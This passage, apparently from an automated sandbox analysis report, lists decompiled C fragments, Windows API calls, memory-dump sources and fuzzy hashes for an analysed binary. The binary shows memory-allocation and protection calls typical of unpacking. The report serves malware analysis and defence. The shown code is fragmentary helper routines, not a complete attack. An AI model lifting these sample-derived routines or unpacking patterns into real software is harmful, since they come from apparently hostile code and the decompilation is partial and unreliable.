                                                                                                                                  					HeapDestroy(_t7);
                                                                                                                                  				}
                                                                                                                                  				goto L8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(000002E0,00000001,031A191C), ref: 031A445B
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 031A446A
                                                                                                                                  • CloseHandle.KERNEL32(000002E0), ref: 031A448B
                                                                                                                                  • HeapDestroy.KERNEL32(057E0000), ref: 031A449B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4109453060-0
                                                                                                                                  • Opcode ID: bf8dd51cdfe5289c5604db35647abf94023078104e6a59e87722559b368f2856
                                                                                                                                  • Instruction ID: 0e79659d4f011e383f38994c7197f01938b058a7c865701e0f67408989f4b92f
                                                                                                                                  • Opcode Fuzzy Hash: bf8dd51cdfe5289c5604db35647abf94023078104e6a59e87722559b368f2856
                                                                                                                                  • Instruction Fuzzy Hash: 42F03779700F129BDF24BB39EA48A4376DCAB0C763B090110B805D7688DF60C484D6B0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
                                                                                                                                  • Opcode ID: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction ID: 39835b0edfa9c604f16208a467f4e7223842532e9d05214564326cd04fe60ae8
                                                                                                                                  • Opcode Fuzzy Hash: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction Fuzzy Hash: 57C1C2319042369ADB649FE4CC50BEA73BDFF65718F3045AAD80697284EB31DA81CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction ID: bf31e69305876a649dd19c868a5efa82f2a87730dfe5c88523ab3639ef6db876
                                                                                                                                  • Opcode Fuzzy Hash: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction Fuzzy Hash: AF517961A2C102DEDF81B6E4C9503AB7BACDF41750F304D79F8A1922DCEB32C4919E86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E031A27C7(void* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				_Unknown_base(*)()* _t9;
                                                                                                                                  				signed int _t11;
                                                                                                                                  				intOrPtr _t12;
                                                                                                                                  				struct HINSTANCE__* _t14;
                                                                                                                                  				intOrPtr _t17;
                                                                                                                                  				intOrPtr _t20;
                                                                                                                                  
                                                                                                                                  				_t9 =  *0x31ad2d8;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_t20 =  *0x31ad28c; // 0x2e4
                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                  						_t11 =  *_t9(_t20,  &_v8);
                                                                                                                                  						if(_t11 == 0) {
                                                                                                                                  							_v8 = _v8 & _t11;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				_t12 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t3 = _t12 + 0x31ae0af; // 0x4e52454b
                                                                                                                                  				_t14 = GetModuleHandleA(_t3);
                                                                                                                                  				_t17 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t4 = _t17 + 0x31ae9ea; // 0x6f577349
                                                                                                                                  				 *0x31ad2ac = _t14;
                                                                                                                                  				_t9 = GetProcAddress(_t14, _t4);
                                                                                                                                  				 *0x31ad2d8 = _t9;
                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,031A26C2,?,00000001,?,?,?,031A1900,?), ref: 031A27EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6F577349), ref: 031A2804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Nt
                                                                                                                                  • API String ID: 1646373207-3999644925
                                                                                                                                  • Opcode ID: ea445524b502176ce299f7ef3fa508168dd2e7ad1b88656ec30dc977644291f9
                                                                                                                                  • Instruction ID: 36e81b40d3038431c3c5c6d41b14e5088fd7b587782fc3638deae8c9f36f6dcc
                                                                                                                                  • Opcode Fuzzy Hash: ea445524b502176ce299f7ef3fa508168dd2e7ad1b88656ec30dc977644291f9
                                                                                                                                  • Instruction Fuzzy Hash: 70F08C75901E0ADFDB09EBA8E914A9A73ECEB0C307B140146E401D3108EB70EA42DBB4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A2291(CHAR* _a4) {
                                                                                                                                  				long _t9;
                                                                                                                                  				CHAR* _t10;
                                                                                                                                  
                                                                                                                                  				_t10 = 0;
                                                                                                                                  				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
                                                                                                                                  				if(_t9 != 0) {
                                                                                                                                  					_t10 = E031A75F6(_t9);
                                                                                                                                  					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
                                                                                                                                  						E031A4AAB(_t10);
                                                                                                                                  						_t10 = 0;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t10;
                                                                                                                                  			}






                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031A1083,73797325), ref: 031A22A2
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031A22BC
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                                                  • String ID: PGt
                                                                                                                                  • API String ID: 1564683301-293773470
                                                                                                                                  • Opcode ID: c87d6411f13d48a88c0fba404d8e341a2c43a3fe8f0bf52599bb1d2bca514810
                                                                                                                                  • Instruction ID: a1e6139c41b20070ae69def55aeb289323bf957e719b81373ac6bbeea34876ea
                                                                                                                                  • Opcode Fuzzy Hash: c87d6411f13d48a88c0fba404d8e341a2c43a3fe8f0bf52599bb1d2bca514810
                                                                                                                                  • Instruction Fuzzy Hash: 5DE0123A501A3227423199AE4C44D6BDD5CEF9D9F37050525B905D3110DB20C80291F4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E031A1EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr* _t22;
                                                                                                                                  				void* _t27;
                                                                                                                                  				char* _t30;
                                                                                                                                  				void* _t33;
                                                                                                                                  				void* _t34;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t37;
                                                                                                                                  				void* _t39;
                                                                                                                                  				int _t42;
                                                                                                                                  
                                                                                                                                  				_t17 = __eax;
                                                                                                                                  				_t37 = 0;
                                                                                                                                  				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                  				_t2 = _t17 + 1; // 0x1
                                                                                                                                  				_t28 = _t2;
                                                                                                                                  				_t34 = E031A75F6(_t2);
                                                                                                                                  				if(_t34 != 0) {
                                                                                                                                  					_t30 = E031A75F6(_t28);
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						E031A4AAB(_t34);
                                                                                                                                  					} else {
                                                                                                                                  						_t39 = _a4;
                                                                                                                                  						_t22 = E031AA971(_t39);
                                                                                                                                  						_v8 = _t22;
                                                                                                                                  						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                  							_a4 = _t39;
                                                                                                                                  						} else {
                                                                                                                                  							_t26 = _t22 + 2;
                                                                                                                                  							_a4 = _t22 + 2;
                                                                                                                                  							_t22 = E031AA971(_t26);
                                                                                                                                  							_v8 = _t22;
                                                                                                                                  						}
                                                                                                                                  						if(_t22 == 0) {
                                                                                                                                  							__imp__(_t34, _a4);
                                                                                                                                  							 *_t30 = 0x2f;
                                                                                                                                  							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t42 = _t22 - _a4;
                                                                                                                                  							memcpy(_t34, _a4, _t42);
                                                                                                                                  							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                  							__imp__(_t30, _v8);
                                                                                                                                  						}
                                                                                                                                  						 *_a8 = _t34;
                                                                                                                                  						_t37 = 1;
                                                                                                                                  						 *_a12 = _t30;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t37;
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A,?,05BD9618), ref: 031A1ECD
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                    • Part of subcall function 031AA971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,031A1EFB,00000000,00000001,00000001,?,?,031A5405,00000000,00000000,74E481D0,05BD9618), ref: 031AA97F
                                                                                                                                    • Part of subcall function 031AA971: StrChrA.SHLWAPI(?,0000003F,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60,?), ref: 031AA989
                                                                                                                                  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,031A5405,00000000,00000000,74E481D0,05BD9618,?,?,031A2A8A), ref: 031A1F2B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,74E481D0), ref: 031A1F3B
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 031A1F47
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3767559652-0
                                                                                                                                  • Opcode ID: 0a85702b288c40f416b0b0cbda5fb41798edffb4584f5b63c74cc08f5f492c7f
                                                                                                                                  • Instruction ID: 8139db6b5e3b48431322a1993ff39f284758e28da1c3786a5ffc729e791d64fa
                                                                                                                                  • Opcode Fuzzy Hash: 0a85702b288c40f416b0b0cbda5fb41798edffb4584f5b63c74cc08f5f492c7f
                                                                                                                                  • Instruction Fuzzy Hash: 6021937E504B95BBCB02DF7CC844AAA7FA9EF0A281F094064F9049F212D734C94487A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _t18;
                                                                                                                                  				int _t25;
                                                                                                                                  				int _t29;
                                                                                                                                  				int _t34;
                                                                                                                                  
                                                                                                                                  				_t29 = lstrlenW(_a4);
                                                                                                                                  				_t25 = lstrlenW(_a8);
                                                                                                                                  				_t18 = E031A75F6(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                  				_v8 = _t18;
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					_t34 = _t29 + _t29;
                                                                                                                                  					memcpy(_t18, _a4, _t34);
                                                                                                                                  					_t10 = _t25 + 2; // 0x2
                                                                                                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,05BD9364,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A132E
                                                                                                                                  • lstrlenW.KERNEL32(031A50AD,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A1335
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,031A50AD,004F0053,05BD9364,?,?,?,?,?,?,031A54EF), ref: 031A1355
                                                                                                                                  • memcpy.NTDLL(74E069A0,031A50AD,00000002,00000000,004F0053,74E069A0,?,?,031A50AD,004F0053,05BD9364), ref: 031A1368
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2411391700-0
                                                                                                                                  • Opcode ID: 11e81936c2f81644d1e376305b216c2af246a3779da5e069dedc6c72c50495b1
                                                                                                                                  • Instruction ID: 07bde782fac07afc7590684d020b53ff6361dbef45a9421d69b5ca7fb48c1d8e
                                                                                                                                  • Opcode Fuzzy Hash: 11e81936c2f81644d1e376305b216c2af246a3779da5e069dedc6c72c50495b1
                                                                                                                                  • Instruction Fuzzy Hash: E2F0FF7A900519BBCF11EFA9CD44C9F7BACEF492557154066FD04DB101E731EA149BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(05BD9B10,00000000,00000000,7691C740,031A467E,00000000), ref: 031A38DA
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 031A38E2
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • lstrcpy.KERNEL32(00000000,05BD9B10), ref: 031A38F6
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 031A3901
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 74227042-0
                                                                                                                                  • Opcode ID: c04f0f971771272c2ed29820919bb992d2573ae54260b505324af57a15ca39d4
                                                                                                                                  • Instruction ID: e786c6d71f3fbcd6ca639e5f17c03406a3d4dfc2471b11a4c1b70a0c1bcad7cc
                                                                                                                                  • Opcode Fuzzy Hash: c04f0f971771272c2ed29820919bb992d2573ae54260b505324af57a15ca39d4
                                                                                                                                  • Instruction Fuzzy Hash: 3DE0927B501E20678711ABE8AD48C5BFBACEF8D7623040416F600D3104CB2089019BF1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Executed Functions

                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E97DA28), ref: 6E97E097
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E97DA88), ref: 6E97E0CE
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E97E12E
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E164
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00000000,00000004,6E97DFB9), ref: 6E97E269
                                                                                                                                  • VirtualProtect.KERNEL32(6E8D0000,00001000,00000004,6E97DFB9), ref: 6E97E290
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9), ref: 6E97E35D
                                                                                                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,6E97DFB9,?), ref: 6E97E3B3
                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E97E3CF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548674297.000000006E97D000.00000040.00020000.sdmp, Offset: 6E97D000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2574235972-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E8E5696
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97B7A0,000008BB), ref: 6E8E576F
                                                                                                                                    • Part of subcall function 6E8E72B0: task.LIBCPMTD ref: 6E8E7352
                                                                                                                                    • Part of subcall function 6E8EBA20: swap.LIBCPMTD ref: 6E8EBA39
                                                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000007,00000007,00000000,6E967144,?,?,?,?,?,00000000), ref: 6E8E5950
                                                                                                                                  • std::locale::locale.LIBCPMTD ref: 6E8E59D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName$CreateSemaphorestd::locale::localeswaptask
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 756721536-1684325040
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
